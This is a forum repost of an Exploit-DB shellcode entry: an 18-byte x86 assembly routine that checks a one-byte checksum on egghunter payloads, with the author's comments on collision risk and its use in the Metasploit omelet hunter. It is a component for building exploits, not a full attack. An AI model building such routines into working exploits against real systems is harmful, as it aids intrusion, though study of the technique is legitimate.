Exploit Windows/x86 - Egghunter Checksum Routine Shellcode (18 bytes)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
14873
Проверка EDB
  1. Пройдено
Автор
DIJITAL1
Тип уязвимости
SHELLCODE
Платформа
WINDOWS_X86
CVE
N/A
Дата публикации
2010-09-01
Код:
;Exploit Title: Shellcode Checksum Routine
;Date: Sept 1 2010
;Author: dijital1
;Software Link:  http://www.ciphermonk.net/code/exploits/shellcode-checksum.asm
;Tested on: Omelet Hunter Shellcode in MSF
;"|------------------------------------------------------------------|"
;"|                         __               __                      |"
;"|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
;"|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
;"| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
;"| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
;"|                                                                  |"
;"|                                       http://www.corelan.be:8800 |"
;"|                                              [email protected] |"
;"|                                                                  |"
;"|-------------------------------------------------[ EIP Hunters ]--|"
;"               -= Egg Hunter Checksum Routine     - dijital1 =-     "

[BITS 32]

;Author: Ron Henry - dijital1
;Email: [email protected]
;Site: http://www.ciphermonk.net
;Greetz to Exploit-db and Team Corelan

;Ok... couple of assumptions with this code. First, we're using a single
;byte as the checksum which gives us a 1 in 255 or ~0.39% chance of a 
;collision.
;We consider this a worthwhile risk given the overall size of the code; 18 bytes.

;There are a couple ways to implement this, but a good example is how it
;was used in Peter Van Eeckhoutte's omelet egghunter mixin that was recently
;added to the Metasploit Framework.

;We're using a 1 byte footer at the end of the shellcode that contains the
;checksum generated at shellcode creation.

; Variables eax: accumulator
;           edx: points to current byte in shellcode
;           ecx: counter

egg_size equ 0x7a       ;we're testing 122 bytes in this instance

find_egg:

xor ecx, ecx            ;zero the counter
xor eax, eax            ;zero the accumlator

calc_chksum_loop:
add al, byte [edx+ecx]  ;add the byte to running total
inc ecx                 ;increment the counter
cmp cl, egg_size        ;cmp counter to egg_size
jnz calc_chksum_loop    ;if it's not equal repeat

test_ckksum:
cmp al, byte [edx+ecx]  ;cmp eax with 1 byte checksum
jnz find_egg            ;search for another egg if checksum is bogus
 
Источник
www.exploit-db.com

Похожие темы